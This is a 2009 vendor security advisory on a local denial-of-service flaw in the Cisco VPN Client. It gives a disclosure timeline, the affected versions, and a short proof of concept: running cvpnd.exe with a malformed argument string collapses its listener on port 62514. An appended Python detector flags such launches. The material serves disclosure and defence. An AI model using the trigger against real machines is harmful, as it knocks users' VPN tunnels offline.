© Neurowork™ 2010. All rights reserved.
Syb Security is a business unit of Neurowork™.

Advisories

SYBSEC-ADV17: Cisco VPN Client 0day Denial Of Service

Title
Cisco VPN Client 0day Denial Of Service
ID
SYBSEC-ADV17
Severity
Medium - Remote Denial Of Service (DoS)
History

06/03/2009 The vulnerability was discovered.
07/03/2009 Exploit/PoC code was developed (private).
09/03/2009 Cisco PSIRT was notified about the issue.
11/03/2009 Vendor response asking for details of the testing environment.
12/03/2009 Test scenario explained and a PDF document with details sent.
16/03/2009 Developers/PSIRT confirmed the vulnerability.
19/03/2009 New test scenarios around new versions (Cisco VPN client).
23/03/2009 Cisco PSIRT assigned an internal tracking ID, PSIRT-0676131279.
23/03/2009 Cisco PSIRT assigned Bug ID CSCsz49276.
15/04/2009 New advisory release (private).
16/04/2009 New PSIRT feedback: no ETA available.
23/04/2009 The development team working on the fix.
01/05/2009 The development team estimated one month to fix.
01/06/2009 New PSIRT feedback: no ETA available.
29/06/2009 The development team estimated one month to fix.
28/07/2009 The development team working on a maintenance release.
28/07/2009 The development team estimated one month to fix.
02/09/2009 New vulnerabilities found in the Cisco VPN client.
02/09/2009 The development team cannot publish the new version 5.0.6.
02/09/2009 The development team working on a maintenance release.
02/09/2009 The development team estimated one month to fix.
10/09/2009 The BETA program should be finished by the end of October and the client posted next month.
07/10/2009 The development team estimated one month to fix.
11/11/2009 New PSIRT feedback: RNA available.
19/11/2009 The vulnerability goes public and PSIRT is informed.
19/11/2009 Fix and details will be available on the Cisco IntelliShield Alert & Bug Toolkit.
Scope
Application Denial of Service
Platforms
Cisco VPN client version 5.0.03.0560
Cisco VPN client Version 5.0.04.0300
Cisco VPN client Version 5.0.05.0290
Cisco VPN client Version 4.8.02.0010
Author
Alex Hernandez aka alt3kx <ahernandez [at] sybsecurity [dot] com>
URL
http://www.sybsecurity.com/advisors/SYBSEC-ADV17-Cisco_VPN_0day_Client_Denial_Of_Service
Release
Public
Overview
The Cisco Virtual Private Network (VPN) Client establishes an encrypted tunnel between a local system and a Cisco VPN concentrator. The tunnel provides data integrity and confidentiality, allowing users a secure connection to a corporate network otherwise from a public non-trusted network.
Affected versions
The vulnerability has been reported in the following Cisco VPN Client versions:

Cisco VPN client version 5.0.03.0560
Cisco VPN client Version 5.0.04.0300
Cisco VPN client Version 5.0.05.0290
Cisco VPN client Version 4.8.02.0010
Description
A Denial of Service (DoS) attack on the Win32 VPN client platform can be exploited locally to collapse the VPN client through the "cvpnd.exe" service, which runs with "SYSTEM" privileges.

Prerequisites: check that the default ports are open:

PORT STATE SERVICE
62514/tcp open cvpnd
62514/udp open cvpnd
Workaround
Upgrade the Cisco VPN client to the fixed version listed at:

*BugToolKit
http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276

*IntelliShield Alert
http://tools.cisco.com/security/center/viewAlert.x?alertId=19445

The vendor has released a patch to address this issue.
Contact the vendor for details on obtaining and applying the appropriate updates.
Acknowledgments
This vulnerability has been found and researched by:
- Alex Hernandez aka alt3kx <ahernandez [at] sybsecurity [dot] com>
References
Details
"A denial of service attack against the VPN client on the Win32 platform can be exploited locally, causing the service to collapse through the execution of the cvpnd.exe binary.

By default, cvpnd.exe runs with "SYSTEM" privileges on the localhost; an intruder who has previously signed in to the victim's system, locally or remotely, can execute this binary and accomplish a denial of service. This service is found listening on TCP/UDP port 62514 and is, coincidentally, in charge of setting up and tearing down the encrypted tunnels between the client and the VPN concentrator.

PID=636
Name=cvpnd
Service=CVPND
Listening=TCP: 62514 62514 UDP: 62514 <- Open ports
Path=C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe

The host victim executes the VPN client normally, ready to establish an encrypted tunnel to the concentrator.

This automatically starts the "cvpnd.exe" service listening on TCP/UDP port 62514.

C:\>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 127.0.0.1:1040 127.0.0.1:62514 ESTABLISHED
TCP 127.0.0.1:62514 127.0.0.1:1040 ESTABLISHED <-here

We confirm the locally established connection with netcat.exe to port 62514:

C:\>nc -vvn 127.0.0.1 62514
(UNKNOWN) [127.0.0.1] 62514 (?) open

The intruder, holding only an unprivileged account on the local machine running the Cisco VPN Client, navigates to the full path of "cvpnd.exe":

C:\Program Files\Cisco Systems\VPN Client>dir *.exe

Volume in drive C has no label.
Volume Serial Number is DC13-87F8

Directory of C:\Program Files\Cisco Systems\VPN Client

6/19/2008 06:08p 246,576 autoinstall.exe
6/19/2008 06:08p 262,960 autoinstallgui.exe
6/19/2008 06:08p 328,496 autoupdate.exe
6/19/2008 06:01p 1,028,219 cisco_cert_mgr.exe
6/19/2008 06:08p 1,528,608 cvpnd.exe <- here
6/19/2008 06:08p 176,944 ipsecdialer.exe
6/19/2008 06:08p 172,840 IPSecLog.exe
6/19/2008 06:08p 230,176 ppptool.exe
6/19/2008 06:08p 217,888 SetMTU.exe
6/19/2008 06:08p 86,824 VAInstaller.exe
6/19/2008 06:08p 267,040 vpnclient.exe
6/19/2008 06:08p 1,544,984 vpngui.exe
12 File(s) 6,091,555 bytes
0 Dir(s) 7,511,080,960 bytes free

By executing the "cvpnd.exe" binary directly, the attacker passes it a malformed argument string:

C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEE

The previously open port has now collapsed, and netcat shows the connection refused:

C:\>nc -vvn 127.0.0.1 62514
(UNKNOWN) [127.0.0.1] 62514 (?): connection refused
sent 0, rcvd 0: NOTSOCK
"
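A defender-side check for the condition described above, as an added example that is not part of the advisory: it flags process-creation records in which cvpnd.exe was launched outside the service manager, by a non-SYSTEM account, or with command-line arguments, and reproduces the netcat probe against TCP 62514 in code. Sysmon-style field names (Image, CommandLine, User, ParentImage) and services.exe as the legitimate parent are assumptions; the sample events are constructed.

```python
"""Defender-side check for the SYBSEC-ADV17 condition: cvpnd.exe launched by hand (with
arguments, by a non-SYSTEM account, not by the service manager) and the local cvpnd listener
on TCP 62514 no longer accepting connections. Sysmon-style fields assumed; events constructed."""
import socket
CVPND_IMAGE = r"c:\program files\cisco systems\vpn client\cvpnd.exe"
SERVICES_EXE = r"c:\windows\system32\services.exe"  # assumed parent of the legitimate service start
CVPND_PORT = 62514
SAMPLE_EVENTS = [  # constructed sample process-creation records, not from the advisory
    {"Image": r"C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe",
     "CommandLine": r'"C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe"',
     "User": r"NT AUTHORITY\SYSTEM", "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe",
     "CommandLine": r"C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe " + "A" * 50,
     "User": r"WORKSTATION\lowpriv", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Cisco Systems\VPN Client\vpngui.exe",
     "CommandLine": r'"C:\Program Files\Cisco Systems\VPN Client\vpngui.exe"',
     "User": r"WORKSTATION\lowpriv", "ParentImage": r"C:\Windows\explorer.exe"},
]

def extra_args(event):
    """Return whatever follows the executable path in the command line ("" if nothing)."""
    cl, img = event["CommandLine"].strip(), event["Image"]
    if cl.startswith('"'):                          # quoted executable path
        rest = cl[cl.find('"', 1) + 1:]
    elif cl.lower().startswith(img.lower()):        # unquoted path that contains spaces
        rest = cl[len(img):]
    else:                                           # fallback: first token is the executable
        rest = cl.split(None, 1)[1] if " " in cl else ""
    return rest.strip()

def suspicious_cvpnd_start(event):
    """Reasons a cvpnd.exe start looks manual; None for other images or a normal service start."""
    if event["Image"].lower() != CVPND_IMAGE:
        return None
    reasons, args = [], extra_args(event)
    if event["ParentImage"].lower() != SERVICES_EXE:
        reasons.append("parent is %s, not services.exe" % event["ParentImage"])
    if event["User"].upper() != r"NT AUTHORITY\SYSTEM":
        reasons.append("launched by non-SYSTEM account %s" % event["User"])
    if args:
        reasons.append("%d bytes of command-line arguments" % len(args))
    return reasons or None

def cvpnd_listener_up(host="127.0.0.1", port=CVPND_PORT, timeout=1.0):
    """The advisory's netcat probe in code: does the cvpnd port still accept a connection?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:                                 # refused once the service has collapsed
        return False
```

Feeding real process-creation events through suspicious_cvpnd_start and polling cvpnd_listener_up before and after gives a simple alert that the listener on 62514 went away right after a manual cvpnd.exe launch.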
Exploit tool